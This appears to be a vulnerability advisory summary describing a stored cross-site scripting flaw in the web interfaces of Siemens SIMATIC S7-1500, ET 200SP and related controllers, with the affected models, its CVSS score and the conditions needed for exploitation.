The vulnerability is caused by the failure of Siemens web interfaces to properly validate and escape the PLC or station name that is displayed on the Communication parameters page. An attacker who is authorized to download a TIA project can insert arbitrary JavaScript into the name. When a user with suitable rights opens the page, the injected code executes in that user's browser session. This XSS can be leveraged to run client‑side script that may exfiltrate credentials, manipulate session cookies, or otherwise act with the privileges of the affected user.

Affected Siemens devices include the SIMATIC Drive Controllers (CPU 1504D TF, CPU 1507D TF), the SIMATIC ET 200SP family (CPUs 1510SP, 1512SP, 1514SP, 1515SP and their variants), the SIMATIC S7‑1500 controllers (CPUs 1511‑1, 1511C‑1, 1513pro, 1515‑2, 1516‑3, 1518‑4 and related models), the SIMATIC ET 200pro (CPUs 1513PRO, 1516PRO), the SIMATIC S7‑1500 software controllers (various 1507S, 1508S, Linux and advanced PLCSIM variants), and the SIPLUS derivatives of the ET 200SP and S7‑1500 lines.

The CVSS score of 9.3 indicates a high severity flaw. The EPSS score is not available, and the vulnerability is not listed in the CISA KEV catalog, so no large‑scale exploitation has been reported yet. Exploitation requires an authenticated attacker who can download a TIA project; therefore typical attack vectors involve internal users or compromised credentials. Once the script is injected, it runs in the scope of any user that views the page, giving the attacker the capabilities of that user within the web interface.